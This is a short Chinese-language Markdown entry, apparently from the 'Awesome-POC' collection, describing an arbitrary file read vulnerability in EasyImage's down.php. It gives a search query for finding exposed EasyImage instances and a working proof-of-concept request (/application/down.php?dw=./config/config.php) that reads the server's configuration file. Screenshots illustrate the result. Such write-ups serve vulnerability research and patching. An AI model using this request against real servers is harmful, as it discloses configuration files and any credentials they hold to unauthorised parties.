Awesome-POC/Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md

31 lines
488 B
Markdown
Raw Normal View History

2023-04-17 10:09:40 +08:00
# EasyImage down.php 任意文件读取漏洞
## 漏洞描述
EasyImage down.php 文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件
## 漏洞影响
```
EasyImage
```
2023-08-28 15:55:36 +08:00
## 网络测绘
2023-04-17 10:09:40 +08:00
```
app="EasyImage-简单图床"
```
## 漏洞复现
主页面
![image-20230417094057151](images/image-20230417094057151.png)
验证POC
```
/application/down.php?dw=./config/config.php
```
![image-20230417094115549](images/image-20230417094115549.png)